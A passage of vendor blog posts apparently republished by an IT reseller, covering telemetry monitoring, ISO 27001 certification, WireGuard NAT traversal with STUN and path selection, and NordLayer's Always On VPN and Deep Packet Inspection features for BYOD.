To show storage usage, waiting times, and likely disk failures, specific telemetry is required.

Again, it is important to monitor both overuse and underuse of storage resources.

Some basic application telemetry monitoring data

It is very important to monitor telemetry involving database access and processing – for instance, the number of open database connections, which can spike and affect performance.

Tracking over time allows you to spot design decisions that don’t change as application usage grows.

It is equally crucial to control the number of queries to the database, their response times, and the amount of information circulating between the database and applications.

Outliers and averages should also be taken into account.

Uncommon latency can be concealed or hidden if only averages are controlled, but these outliers could still have a negative impact and irritate users.
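A quick illustration with synthetic numbers shows how an average can hide outliers that a percentile exposes:

```python
import statistics

# Synthetic response times (ms): mostly fast, with a few slow outliers
# that the average largely absorbs.
latencies = [20] * 95 + [2000] * 5

mean = statistics.mean(latencies)                        # 119 ms
p99 = sorted(latencies)[int(len(latencies) * 0.99) - 1]  # 2000 ms

print(f"mean={mean:.0f} ms, p99={p99} ms")
# prints: mean=119 ms, p99=2000 ms
```

One user in twenty is waiting two full seconds, yet the mean still reads as roughly acceptable; this is why dashboards should plot percentiles and standard deviations alongside averages.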

Your monitoring strategy should always take into account tool exceptions, database errors and warnings, and application server logs, looking for unusual activity…

And that’s just the beginning!

Your monitoring software

Having a solid monitoring strategy is crucial, but so is having a well-thought-out reaction strategy that incorporates:

  • Determining, understanding and initiating root cause analysis.
  • A written communication strategy that includes the names and contact details of those responsible.
  • Identifying easy solutions to restore the program in the short term.
  • A research strategy to prevent future problems.

Telemetry Monitoring Elements

Some telemetry monitoring elements that you may use:

  • Dashboards or other real-time system information and telemetry tools.
  • Technologies for analyzing records safe for use with production systems.
  • Business intelligence to retrieve data from records, such as usage trends or security issues during specific time periods.
  • Tools that automate risk detection, recovery, and mitigation to get rid of manual labor.

Using a centralized system and working with a software vendor, you can put in place a robust monitoring strategy that develops over time and becomes more comprehensive.

And there, my friend, is where we come in!



About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.

We received ISO/IEC 27001!

We live in an uncertain world and monitoring should try to ensure that whatever happens we will always stay informed.

Therefore, security is the basis of everything in monitoring and for us it has always been one of the pillars of our strategy as a product.

Didn’t you know yet? Pandora FMS has obtained ISO/IEC 27001

Security is not a technology; it is a way of thinking and acting. We could even say that it is an attitude.

For years we have attended international fairs and events where computer security is offered as specific products.

Many people may think that by buying products you reinforce your company’s security, but no, that is only a small part of it.

Security is about changing the way we manage the whole organization, from how we share information to how we use systems.

Pandora FMS has always been aware of that and you may see it in our security architecture guide, our GDPR compliance guide -which is also valid for regulations such as PCI/DSS- and of course, because as a company we are certified with ISO 27001.

We don’t boast about it, but we are also one of the few commercial software vendors with a public vulnerability disclosure policy.

ISO 27001 certification provides important backing with our national and international clients, many of whom request information about our business continuity plans, the security of our development and deployment processes, the information privacy protections we have in force, and how we control the information available to our suppliers.

We understand that for them it is as important as it is for us, or even more so, and having a certification that strongly backs us up is something to be proud of.

Many of our clients are pharmaceutical companies, financial institutions – some over a century old – and government entities.

Due to confidentiality contracts we cannot mention their names, but large and small, to a greater or lesser extent, everyone is concerned about aspects related to information security.

Today we can proudly say that not only do we also care about it, but that we have proven our commitment.

But what is ISO/IEC 27001?

ISO/IEC 27001 is a standard for information security (Information technology – Security techniques – Information security management systems – Requirements) approved and published as an international standard in October 2005 by the International Organization for Standardization and by the International Electrotechnical Commission.

It specifies the requirements needed to establish, implement, maintain and improve an information security management system (ISMS) following what is known as the Deming Cycle:

PDCA – an acronym for Plan, Do, Check, Act.

It is consistent with the best practices described in ISO/IEC 27002, formerly known as ISO/IEC 17799, with origins in the BS 7799-2: 2002 standard, developed by the British standards body, the British Standards Institution (BSI).




Reaching beyond 1Gbps: How we achieved NAT traversal with vanilla WireGuard

Nord Security engineers have been hard at work developing Meshnet, a mesh networking solution that employs the WireGuard tunneling protocol. Here are the technical details on how we tackled the challenge of optimizing Meshnet’s speed.


Meshnet is powered by NordLynx, a protocol based on WireGuard. WireGuard is an excellent tunneling protocol. It is open, secure, lightweight, lean, and – thanks to in-kernel implementations like those in the Linux kernel and the Windows NT kernel – really, really fast.


An iperf3 speed test between NordVPN’s staging VPN servers with a single TCP connection tunneled over WireGuard.

At the heart of it is “cryptokey routing,” which makes creating a tunnel almost as easy as tracking a few hundred bytes of state. So having hundreds or even thousands of tunnels from a single machine is feasible.

These properties make WireGuard a very appealing building block for peer-to-peer mesh networks. But before getting there, a challenge or two must still be overcome. So let’s dig into them!

Ground rules

Let’s lay down some ground rules to help us better weigh tradeoffs. First, privacy and security are the priority, so any tradeoff compromising end-to-end encryption or exposing too much information is automatically off the table. Second, speed and stability are among the most important qualities of Meshnet. Finally, to cover all major operating systems (Windows, Android, iOS, macOS, and Linux), any ideas or solutions must be implementable on those platforms.

So here are the ground rules:

Rule #1

Everything will be end-to-end encrypted. Any user data passing between devices must be inaccessible to anyone else – even to Nord Security itself.

Rule #2

No mixing of the data plane (i.e., the code that processes packets) and the control plane (i.e., the code that configures the network), if possible. That’s because any additional logic (e.g., NAT traversal, packet filtering/processing) added to WireGuard will slow it down.

Rule #3

No solutions that target a single WireGuard implementation. Remember those fast in-kernel implementations? In order to reach high throughput everywhere, we must be able to adapt to the intricacies of every platform.

Great! Now let’s get cracking!

NAT traversal 101

Every peer-to-peer application (including Meshnet) has a NAT traversal implementation at its heart. While this is a rather wide topic (just look at the number of related RFCs: RFC3261, RFC4787, RFC5128, RFC8489, RFC8445, RFC8656…), the core principle is quite simple: NATs are generally designed to support outgoing connections really well.

They achieve this by forwarding any outgoing packets while remembering just enough information to be able to discern where and how to forward incoming response packets whenever they arrive. The exact nature of this information and how it is used will determine the type of the NAT and its specific behavior. For example, Linux NATs are based on the conntrack kernel module and one can easily check the state of this information at any moment using the conntrack -L command.

$ sudo conntrack -L
tcp 6 382155 ESTABLISHED src=192.168.3.140 dst=172.217.18.3 sport=60278 dport=443 src=172.217.18.3 dst=192.168.3.140 sport=443 dport=60278 [ASSURED] mark=0 use=1
tcp 6 348377 ESTABLISHED src=192.168.228.204 dst=35.85.173.255 sport=38758 dport=443 src=35.85.173.255 dst=192.168.228.204 sport=443 dport=38758 [ASSURED] mark=0 use=1
......

RFC4787 is a great resource that goes into a lot of detail about NAT behavior in general.

While outgoing connections are handled transparently, incoming connections can be trouble. Without outgoing packets forwarded first (and consequently without the conntrack information), NATs simply do not have any clue where to forward packets of incoming connections and the only choice left is to drop them. At this moment, we finally arrive at the core part of any peer-to-peer connection establishment:

Suppose you shoot a packet from both sides of the peer-to-peer connection at each other roughly at the same time. In this case, the connection will appear to be “outgoing” from the perspective of both NATs, allowing hosts to communicate.

Let’s unpack it a bit:

  • “Shoot a packet” – send a UDP packet. While there are techniques regarding other protocols, only UDP packets matter in this case, as WireGuard is UDP-based. The packet’s payload contents do not matter (it can even be empty), but it’s important to get the headers right.

  • “at each other” – the packet’s source and destination addresses and ports, transmitted from different sides of the connection, must mirror each other just after the first translation has been performed but before any translations by the second NAT occur. No matter what source address and port the NAT on one side uses for outgoing packets, the other side must send its packets to this exact address and port, and vice versa. Unfortunately, some NATs make it very difficult to figure out the translations they are making, which is why NAT traversal is never 100% reliable.

  • “roughly at the same time” – the data about outgoing connections within a NAT isn’t stored forever, so the packet from the other side must reach the NAT before this data disappears. The storage time greatly depends on the NAT – it varies from half a minute to a few minutes.
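The choreography described above can be sketched with plain UDP sockets. This toy example (run here between two local sockets, so no NAT is actually involved) only demonstrates the simultaneous send-and-receive dance; in real traversal each destination would be the NAT-translated endpoint learned via STUN:

```python
import socket

def simultaneous_open(sock_a, sock_b, payload=b"punch"):
    """Both sides send 'at each other' at roughly the same time. Behind
    real NATs, each outgoing packet creates the mapping that lets the
    peer's packet in; on loopback this just shows the choreography."""
    addr_a, addr_b = sock_a.getsockname(), sock_b.getsockname()
    sock_a.sendto(payload, addr_b)
    sock_b.sendto(payload, addr_a)
    sock_a.settimeout(2.0)
    sock_b.settimeout(2.0)
    # If either recv succeeds, the path is open in that direction.
    got_a, _ = sock_a.recvfrom(2048)
    got_b, _ = sock_b.recvfrom(2048)
    return got_a, got_b
```

The payload can even be empty; as the article notes, what matters is that the headers, and therefore the NAT mappings, line up.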


An example NAT traversal scenario.

This technique is surprisingly general. Only small bits and pieces differ within the different cases a typical peer-to-peer application needs to support.

A few things need to be done right, but all of this is possible with vanilla WireGuard and the established ground rules. Take two packets and send them from the right source to the right destination at roughly the same time, without even worrying about what’s inside of the packets. How hard can it be? #FamousLastWords.

WG-STUN

The key part of any NAT traversal implementation is figuring out what translations will be performed by the NAT. In some cases, there is no NAT (e.g., host on the open internet), or it is possible to simply request a NAT to perform specific translations instead (e.g., by using UPnP RFC6970, PMP RFC6886). Sometimes, the translation has to be observed in action. Luckily, a standardized protocol STUN (RFC8489) does just that.

While there are some intricacies with the STUN protocol itself, the so-called STUN binding request is at its core. This binding request usually is formatted by the client behind NAT and processed by the server hosted on the open internet. Upon receiving this request, the server will look at the source IP address and port of the request packet and add it to the payload of the response packet.
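For reference, a STUN Binding Request and the XOR-MAPPED-ADDRESS decoding it elicits are compact enough to sketch directly from RFC 8489 (an illustrative fragment, not Nord Security’s code):

```python
import os
import socket
import struct

MAGIC = 0x2112A442  # STUN magic cookie (RFC 8489)

def binding_request() -> bytes:
    # Type 0x0001 (Binding Request), attribute length 0, magic cookie,
    # followed by a random 96-bit transaction ID.
    return struct.pack("!HHI", 0x0001, 0, MAGIC) + os.urandom(12)

def xor_mapped_address(attr_value: bytes) -> tuple:
    """Decode an IPv4 XOR-MAPPED-ADDRESS attribute value: the port is
    XORed with the top 16 bits of the magic cookie, the address with
    the whole cookie."""
    _, family, xport = struct.unpack("!BBH", attr_value[:4])
    port = xport ^ (MAGIC >> 16)
    xaddr = struct.unpack("!I", attr_value[4:8])[0]
    addr = socket.inet_ntoa(struct.pack("!I", xaddr ^ MAGIC))
    return addr, port
```

The XOR step exists because some NATs rewrite any literal copy of their own IP they spot in packet payloads; XORing with the cookie hides the address from that interference.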

A STUN binding request captured with Wireshark.

Some NATs will use the same translation of the source IP address and port regardless of the destination (let’s call them “friendly NATs”). The same source IP address and source port will be used for the packets going to the STUN server and to any Meshnet peer. But there is a catch! The same NAT translations will be performed only as long as the packets use the same source IP and port for all destinations on the originating host.

Here’s the first challenge. Vanilla WireGuard is not capable of performing STUN requests on its own. Moreover, once WireGuard reserves a source port for communications with its peers, other programs cannot, generally, use it anymore.

While it is technically possible to add STUN functionality to WireGuard, it would violate our ground rule #2 and would seriously complicate the relationship with rule #3. The search continues.

The WireGuard protocol is designed to create IP tunnels. Maybe it’s possible to transmit STUN requests inside of the tunnel? That way, the STUN request would get encapsulated, resulting in two IP packets: inner (STUN) and outer (WireGuard). Luckily, according to the WireGuard whitepaper, all outer packets destined to any peer should reuse the same source IP and port:

Note that the listen port of peers and the source port of packets sent are always the same.

It’s been the behavior of all WireGuard implementations tested for this blog post.

Using this property, we can assume that packets destined for distinct WireGuard peers will get the same translations when going through friendly NATs. That’s precisely what we need when using an external service (like STUN) to determine which translations NAT will use when communicating with Meshnet peers.

But no standard STUN server can communicate with WireGuard directly. Even if we hosted a STUN server at the other end of the tunnel, after decapsulation, the server would respond with the inner packet’s source IP and port – but we need the outer packet’s source IP and port.

Say hello to WG-STUN, a small service that maintains WireGuard tunnels with clients and waits for STUN requests inside the tunnels. When a binding request arrives, instead of looking into the binding request packet, the STUN server takes the address from the WireGuard peer itself and writes it into the STUN binding response. Later, it encapsulates the packet according to WireGuard protocol and sends it back to the client. On the client side, to figure out what translations will be performed by the NAT for the WireGuard connections, we just need to add WG-STUN peer and transmit a standard STUN request inside the tunnel.

A Wireshark capture of a WG-STUN binding request.

In the picture above, you can see a standard WG-STUN request. In this case, a STUN request was sent to 100.64.0.4, which is a reserved IP for an in-tunnel STUN service. The request got encapsulated and transmitted by WireGuard to one of the WG-STUN servers hosted by Nord Security. This WG-STUN server is just a standard WireGuard peer with the allowed IP set to 100.64.0.4/32, and the endpoint pointed to the server itself.

 

A WG-STUN peer configured on Meshnet interface.

Note that the WG-STUN service is, by design, a small service that is functionally incapable of doing anything other than responding to STUN requests (and ICMP for reachability testing). This way, we are confining this service to the control plane only and adhering to rule #2. Because the WG-STUN service is just a standard peer, WireGuard’s cross-platform interface is more than enough to control the WG-STUN peer in any of the WireGuard implementations (rule #3). Most importantly, due to WireGuard’s encryption, we get privacy and security by default (rule #1).

Path selection

Now we can perform STUN with vanilla WireGuard and figure out which translations the NAT will perform, provided that it is a friendly NAT. Unfortunately, that’s not enough to ensure good connectivity with Meshnet peers. What if there is no NAT at all? What if two NATs are in a chain, and our Meshnet peer is between them? What if a Meshnet peer is running in the VM of a local machine? What if a Meshnet peer managed to “ask” its NAT for specific translations via UPnP? There are quite a few possible configurations here. Sometimes we call these configurations “paths,” describing how one Meshnet peer can reach another. In the real world, the list of potential paths is a lot longer than the list of paths that can sustain the peer-to-peer connection.

 

For example, one Meshnet peer may access the other directly if both are within the same local area network. What’s more, if NAT supports hair-pinning, the same peer may be accessed via the WAN IP address of the router too. Additionally, it is common for a single host to participate in multiple networks at the same time (e.g., by virtualized networks, using multiple physical interfaces, DNATing, etc.). But it is impossible to know in advance which paths are valid and which are not.

For this reason, peer-to-peer applications usually implement connectivity checks to determine which paths allow peers to reach one another (e.g., the checks standardized in ICE (RFC8445)), and when multiple paths pass the checks, they select the best one. These checks are usually performed in the background, separate from the data channel, to avoid interfering with the currently in-use path. For example, if two peers are connected via some relay service (e.g., TURN RFC8656), an attempt to upgrade to a better but unvalidated path (e.g., direct LAN) may cause an interruption until a timeout passes, and that would be deeply undesirable.

While WireGuard implementations indicate the reachability of currently configured peers used for the data plane, the lightweight nature of the WireGuard protocol makes alternative path evaluation out of scope. The question is: how can we separate the data plane from connectivity checks?

Considering the affordable nature of WireGuard tunnels, the most straightforward solution would be to configure two pairs of peers on each Meshnet node – one for the data plane, the other for connectivity checks. But this solution is not feasible in practice. WireGuard peers are identified by their identity (public key), and each interface has only one identity. Otherwise, cryptokey routing and roaming functionality, in its current form, would break. Moreover, mobile platforms can have at most one interface open at any moment, restricting Meshnet nodes to a single identity at a given time.

So let’s look for solutions elsewhere. Here’s how we came to the observation which is now the core principle for performing connectivity checks out of the data plane:

Given that a connection can be established using a pair of endpoints, it is highly likely that performing the same steps with a different source endpoint will also succeed.

It is possible to construct a setup in which this observation does not hold, but it wouldn’t be a natural occurrence. NATs have the same mapping and filtering behavior for any pair of distinct outgoing connections, and RFC 4787 considers NAT determinism a desirable property. UPnP (RFC 6970), NAT-PMP (RFC 6886), and similar protocols behave consistently across distinct requests. And LAN traffic is almost never filtered on a per-source-port basis for outgoing connections.

On the other hand, making such an assumption allows us to completely separate connectivity checks and the data plane. After performing a connectivity check out-of-band, a path upgrade can be done with a high degree of certainty of success.

Therefore, in our Meshnet implementation, Meshnet nodes gather endpoints (as per the ICE standard, RFC 8445) for two distinct purposes: first, to perform connectivity checks, and second, to upgrade the WireGuard connection if the connectivity checks succeed. Once the list of endpoints is known, the endpoints are exchanged between participating Meshnet nodes using relay servers. For privacy and security, the endpoint exchange messages are encrypted and authenticated using X25519 ECDH for key agreement and ChaCha20Poly1305 for AEAD. Afterward, the connectivity checks are performed separately from WireGuard using plain old UDP sockets. If multiple endpoint candidates pass the connectivity check, the candidate with the lowest round-trip time is preferred.
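The check-and-select logic described above can be sketched roughly as follows. This is a minimal illustration, not Nord Security's actual implementation: the probe payload and the idea that any UDP reply counts as a passed check are assumptions made for the sketch.

```python
import socket
import time

def probe_endpoint(addr, payload=b"probe", timeout=1.0):
    """Send a UDP probe to addr; return the round-trip time in seconds, or None on failure."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        start = time.monotonic()
        try:
            sock.sendto(payload, addr)
            sock.recvfrom(1024)   # any reply counts as a passed check
        except OSError:           # timeout or ICMP error: check failed
            return None
        return time.monotonic() - start

def select_best_endpoint(candidates):
    """Probe every candidate endpoint and return the one with the lowest RTT, or None."""
    results = []
    for addr in candidates:
        rtt = probe_endpoint(addr)
        if rtt is not None:
            results.append((rtt, addr))
    return min(results)[1] if results else None
```

Note that the probes use ordinary UDP sockets, completely separate from the WireGuard interface, which is exactly what keeps the data plane undisturbed while alternative paths are evaluated.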

We have validated a path using some pair of endpoints, so the corresponding data plane endpoints are selected and a path upgrade is attempted. If the upgrade fails to establish a connection, the endpoint is banned for a period of time; if it succeeds, we have established a peer-to-peer connection using vanilla WireGuard.
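The temporary ban on failed upgrade candidates can be sketched with a small expiry map. The class name and the default ban duration are illustrative assumptions, not part of the Meshnet codebase.

```python
import time

class EndpointBanList:
    """Track endpoints whose path upgrade failed, banning them temporarily."""

    def __init__(self, ban_seconds=60.0):
        self.ban_seconds = ban_seconds
        self._banned = {}  # endpoint -> ban expiry (monotonic clock)

    def ban(self, endpoint):
        """Record a failed upgrade; the endpoint is skipped until the ban expires."""
        self._banned[endpoint] = time.monotonic() + self.ban_seconds

    def is_banned(self, endpoint):
        """Return True while the ban is active; expired bans are cleared lazily."""
        expiry = self._banned.get(endpoint)
        if expiry is None:
            return False
        if time.monotonic() >= expiry:
            del self._banned[endpoint]  # ban expired; candidate is eligible again
            return False
        return True
```

A monotonic clock is used so that system time adjustments cannot shorten or extend a ban.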

And now we can fire up iperf3 and measure what this means. As you may have realized, we are now measuring vanilla WireGuard itself. For example, running two Meshnet nodes in Docker containers on a single, rather average laptop with an Intel i5-8265U, without any additional tweaking or tuning, we can easily surpass the 2 Gbps mark in a single-TCP-connection iperf3 test.


iperf3 single TCP connection test between two Meshnet nodes.

At the time of writing, the default WireGuard implementation used by Meshnet is the in-kernel implementation on Linux, WireGuard-NT or WireGuard-go on Windows, and boringtun on other platforms.

Conclusion

By solving a few challenges, Nord Security’s Meshnet implementation managed to build a Meshnet based on WireGuard with peer-to-peer capabilities, using only a cross-platform interface plus the benefits of in-kernel WireGuard implementations, and surpassed the 1 Gbps throughput mark. Currently, the implementation is in the process of being released, so stay tuned for a big speed upgrade!

Note: WireGuard and the “WireGuard” logo are registered trademarks of Jason A. Donenfeld.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.


NordLayer feature release: Always On VPN

NordLayer introduces a new addition to the solution’s security stack: Always On VPN. Our most recent feature provides a VPN-only connection for digital organization resources and online browsing. It also ensures IP masking and encryption endure regardless of where and when the user accesses internal and public information.

Always On VPN provides a peripheral security layer for a robust and reactive approach to protecting company assets and users in a continuously evolving technological landscape.

Feature characteristics: what to expect

  • Available for all subscription plans.

  • Central implementation & configuration via Control Panel;
    Individual configuration level via application settings.

  • Compatible with desktop platforms: Windows; macOS (side-loaded version only).

Problem to solve: ensure continuous and secure internet access by disabling unencrypted user connections.

How does it work?

Always On VPN enforces a mandatory connection to a company gateway in order to use the internet. As the feature name implies, user connectivity to the network can resume only with the VPN turned on.

Users with the feature enabled no longer need to connect to the VPN manually. Automation removes the need to remember to turn on the encrypted connection while working, which otherwise poses risks to company data security.

Always On VPN is deployed and starts functioning on an organization member’s device from the moment the user signs in to the NordLayer application on their endpoint with the feature enforced.

A centrally enforced security policy ensures organization members meet company security requirements and follow internal rules.

IT administrators activate the security configuration via the Control Panel. The On/Off toggle for Always On VPN is under the Settings category, Security configurations tab. It allows admins to manage the policy centrally and distribute it to the entire organization.

Employees can enable and disable the feature in the NordLayer application settings as long as the admin hasn’t activated it centrally. Thus, if the IT administrator wants to ensure everyone in the organization has Always On VPN enforced, end users won’t be able to disable it once it is configured centrally via the Control Panel.

What problem does it solve?

IT managers must be sure that organization members use cybersecurity tools according to internal security procedures. Limited skilled IT staff and resources demand maximum efficiency from the deployed cybersecurity strategy, with consolidated access controls.

The Always On VPN feature helps admins ensure that all company members’ online activities stay within organizational security policies. Meanwhile, organizations benefit from a tighter approach to preventing data leaks and breaches.

Always On VPN objectives include:

  1. Enforcement of connection encryption for a remote workforce.

  2. Protection of teams on the move (covers business trips, frequent exposure to public wifi).

  3. Enhancement of data leak prevention for increased-risk companies.

With the Always On VPN feature running, organizations can expect higher reliability for remote connections outside the office network perimeter.

Security by design

Always On VPN interconnects with other NordLayer features. It is an additional security layer for protecting user internet access while connected to the company network, ensuring encrypted user traffic is isolated from untrusted network threats if the secure connection is lost.

The feature syncs with NordLayer’s Device Posture Monitoring to provide information about organization-linked endpoint health and activity. The ThreatBlock feature helps filter out potentially malicious websites users might visit while connected to the company gateway. Always On VPN also ensures that the DNS Filtering and Deep Packet Inspection features operate per the applied settings.

Combined, these features enforce security at user endpoints without affecting employee productivity and without exposing your business to online risks: IT admins can enforce them centrally within seconds, regardless of users’ location, distance, and distribution.


Enabling all ways of working with BYOD

Companies have widely varying takes on protecting their assets and teams. Some businesses have strict internal policies, like allowing only wired peripherals; others force computer shutdown at the end of the working day.

However, rigid restrictions are challenging to keep up with and follow if not monitored closely, especially in hybrid environments. Remote workers, freelancers, teams on different sites, and mobile employees like consultants and salespeople extend a single-location office’s borders.

The fast pace of business and information flow often requires employees to stay present and removes tolerance for anything that puts them out of reach. This brings us to people using their own devices in the workplace, and to the extended, modern version of that practice.

Should organizations encourage the use of endpoints other than corporate-issued ones? And how can you manage the risks that come with them? This article looks closely into securing flexible setups for all ways of working.

Focus definitions

  • Bring Your Own Device (BYOD) is an organizational policy allowing employees to work or access corporate data and applications using or linking personal devices like computers and/or smartphones.

  • Deep Packet Inspection (DPI) is a packet filtering feature that examines data pieces against admin-defined security policies and forbidden keywords to block the information from entering the network.

BYOD in the workplace

In the modern world, incorporating employee-owned devices into the company’s technological ecosystem often happens as part of the daily operations flow. Growing tech literacy and device availability drive the use of personal devices at work.

Some organizations have an unwritten rule that employees must be within reach after working hours, even though it’s not included in their job description. Or how can you quickly solve a situation when you must join a work meeting, but a corporate-issued PC just started a mandatory OS update?

Real-life situations normalize personal phones and laptops for daily or occasional use. It also allows companies to save on supplying extra cell phones to staff. And the workforce is already familiar with their personal phones and laptops, which allows skipping training and adjustment periods without affecting productivity.

The BYOD strategy relieves employees from owning one or more extra devices that aren’t necessary and turn into gadget pollution. Besides, employee-owned devices are more likely to be in use and thus up to date.

Data insights: BYOD policy adoption

According to the BYOD Security Report 2022, the vast majority of organizations (82%) have a policy that allows staff to use their own devices, at least to some extent. Although BYOD is mainly considered an employee-related topic, contractors, partners, customers, and suppliers can also become sources of unmanaged devices in the organization.

BYOD adoption in organizations
Companies with a BYOD strategy record major benefits for organizations and the workforce. Employees using their own devices at work are more satisfied as they aren’t attached to an additional piece of technology that needs to be mastered. It boosts productivity and flexibility with a cost-saving approach.

Effectiveness of BYOD
However, convenience has its price. A BYOD policy exposes the organization to a broader spectrum of risks. Employees manage these non-company-issued devices themselves, so their contents and activity are much harder to supervise.

Risks of BYOD

The idea behind bring your own device is to incorporate unmanaged user devices into the company network as supportive work tools. Technically, such endpoints become a security gap, as they aren’t supervised unless security measures are enforced. To what risks do personally owned user devices expose the organization?

Unknown end-user

A personal device is not necessarily accessed only by its owner. If no lock pattern exists, family members, friends, or anyone else can use the endpoint, which can easily lead to a data breach or leak.

Device loss

Taking your laptop or phone outside the office increases the risk of a lost or stolen device. Any hardware containing business-sensitive information compromises data security, as the data can be extracted or accessed with little effort.

Non-trusted apps and networks

Individual devices mean personal activities. Work-related apps, communication channels, and email accounts mix with entertainment software (at times containing surveillance or malicious elements), streaming services, free-roam browsing, and potential phishing attacks.

Security features to support BYOD

Preventive measures like single sign-on or multi-factor authentication, network segmentation, and rooted-device detection help manage various risks of BYOD.

Integration of a solution to block external threats makes internet browsing safer for users with pre-owned endpoints. NordLayer’s ThreatBlock feature enriches DNS filtering by screening connection inquiries against libraries of malicious sites and blocklisting them from visiting.

Beyond protecting the device itself, encrypting communication channels is a strong addition to BYOD strategy enforcement. Modern encryption used in protocols like NordLynx encodes data in transit, ensuring the confidentiality of sensitive business information when connected to untrusted networks.

Another way to ensure device compliance with organizational security policies is to enable auto-connection to the company’s Virtual Private Network (VPN) once an internet connection is detected, and to use always-on VPN features. Automation minimizes the human-error vulnerability, so users can’t ‘forget’ to switch their devices to the required gateway when accessing company resources.

Let’s shift from the n+1 possible strategies for enabling a BYOD policy and, this time, dig deeper into one of the most prominent security functionalities, Deep Packet Inspection (DPI), which controls what enters the company network regardless of the endpoint’s source.

What is DPI?

Deep Packet Inspection helps protect the company network by filtering out harmful or unwanted sites and applications. It scans data packets of traveling information against flagged keywords and website categories. Unlike DNS filtering, which filters only website data, DPI goes above browser-level restrictions and inspects data on the applications and device levels.

DPI filters packets that may contain malicious elements leading to intrusions and viruses. Alternatively, it allows blocking sources incompatible with work productivity, like gaming or streaming sites.

In short, the feature serves network management by controlling what ports and protocols employees can access while connected to the company gateways, effectively securing the devices as DPI inspects not only the headers but also the contents of data packets.
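The difference between header-only filtering and content inspection can be sketched in a few lines. This is an illustrative toy, not NordLayer's engine; the keyword and category sets are made-up examples, and real DPI products ship curated rule databases.

```python
# Hypothetical admin-defined rules for the sketch.
BLOCKED_KEYWORDS = {b"casino", b"torrent"}
BLOCKED_CATEGORIES = {"gaming", "streaming"}

def inspect_packet(payload, category):
    """Return True if the packet should be blocked.

    Unlike header-only filtering, this looks inside the payload,
    mimicking how DPI matches packet contents against flagged keywords.
    """
    if category in BLOCKED_CATEGORIES:   # site-category rule (admin-defined)
        return True
    lowered = payload.lower()
    return any(kw in lowered for kw in BLOCKED_KEYWORDS)  # content rule
```

In practice the category would come from a website classification database and the payload from the reassembled packet stream, but the decision shape is the same: block on category, otherwise block on flagged content.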

How does DPI enable the flexibility of BYOD policy?

In the post-pandemic era, companies are calibrating which approach, remote or on-site, works best for their organizational culture. Ultimately, the trend clearly favors hybrid work variations, meaning a BYOD policy is implicit in such companies.

Securing remote workforces

Physical distance is the main attribute of remote work. Traveling employees, remote employees, and freelancers are the driving force for implementing a BYOD policy, since acquiring hands-on staff this way is easier and cheaper.

Removing the office-based restrictions of a controlled network prevents IT administrators from actively monitoring the company infrastructure within a contained perimeter. In this case, the security focus can shift from the actor to the conditions of the environment they operate in.

DPI is based on a set of rules that admins impose collectively for the whole organization or teams and selected users. They can define restrictions on what content can’t enter the company network while connected to the organization gateway.

Blocking specific ports and protocols aids the security strategy by stopping:

  • Downloading file-sharing applications 

  • Accessing malicious websites that may inject malware

  • Falling victim to a man-in-the-middle attack while connected to public wifi

  • Entering links with phishing attempts

  • Installing shadow add-ons and software

  • (Un)voluntary data leaking

Office security enhancement

On-premises work is easier to manage, until it turns to online browsing. Dozens of open tabs, links, and distractions on the internet require additional precautions to maintain productivity within the office borders.

A DPI solution enables IT administrators to manage access to the online resources that tend to impact employee effectiveness daily.

First, an organization can simply deny access to streaming, gaming, and other secondary websites unrelated to performing job tasks. Less YouTube, Twitch, or Netflix streaming in the background means more focus on performance quality.

Secondly, unnecessary internet traffic slows down bandwidth within the office. Slow connections disrupt the intended workflow, put pressure on infrastructure, and result in a poor user experience. The DPI feature allows IT admins to eliminate traffic overload on the company network.

Enabling secure BYOD with NordLayer

NordLayer introduced the Deep Packet Inspection (Lite) security feature, focusing on the most tangible organizational pain points of hybrid setups. Security and productivity are business priorities; thus, DPI Lite seals security vulnerabilities whether you are managing globally spread teams and freelancers or unlocking workforce performance.

NordLayer’s DPI Lite is one of the many security layers that, combined with other network management features like DNS filtering and IAM integrations, solidify any cybersecurity approach — and help you find the most straightforward way to improve your organizational security.
